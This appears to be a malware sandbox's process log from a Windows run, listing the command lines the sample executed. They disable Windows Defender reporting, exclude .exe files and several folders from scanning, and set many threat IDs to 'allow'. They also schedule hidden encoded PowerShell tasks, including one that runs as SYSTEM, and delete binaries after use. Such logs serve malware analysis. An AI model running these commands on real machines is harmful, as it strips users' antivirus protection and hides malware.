REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "ScanRename.exe" /f & erase "C:\Program Files (x86)\ScanRename\ScanRename.exe" & exit
C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe
C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe /sid=3 /pid=449
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gwUPXilBw" /SC once /ST 13:30:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2076
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "ScanRename.exe" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gwUPXilBw"
C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe
C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2260
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 836 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2400
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 828 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2396
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2472
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2480
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 856 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2412
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2488
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 828 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2288
C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe
C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2520
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe & exit
C:\Windows\system32\PING.EXE
ping 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1804
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2316
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 1800 -ip 1800
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2408
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2460
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2444
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gwUPXilBw"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 1800 -ip 1800
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bGAvhKhnIPTNQeobsw" /SC once /ST 18:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe\" bt /site_id 757674 /S" /V1 /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 948
C:\Windows\SysWOW64\fontview.exe
"C:\Windows\SYSWOW64\fontview.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 804 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1796
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 948
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 868 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 844 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 3996 -ip 3996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 3996 -ip 3996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 456
C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe
C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe bt /site_id 757674 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 
\"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NxGlAgQUfzUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NxGlAgQUfzUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OdCkbftzuRPDCLooswR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OdCkbftzuRPDCLooswR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WyuevociGfNU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WyuevociGfNU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XxxUzwYQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XxxUzwYQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\unWhUoTpcLxwC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\unWhUoTpcLxwC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\FZMYpcBymcbXiuVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\FZMYpcBymcbXiuVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HsdHtTcNAoJBjrVs\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HsdHtTcNAoJBjrVs\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\FZMYpcBymcbXiuVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\FZMYpcBymcbXiuVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HsdHtTcNAoJBjrVs /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HsdHtTcNAoJBjrVs /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gnMtnfgYj" /SC once /ST 02:48:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gnMtnfgYj"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gnMtnfgYj"
C:\Windows\SysWOW64\schtasks.exe
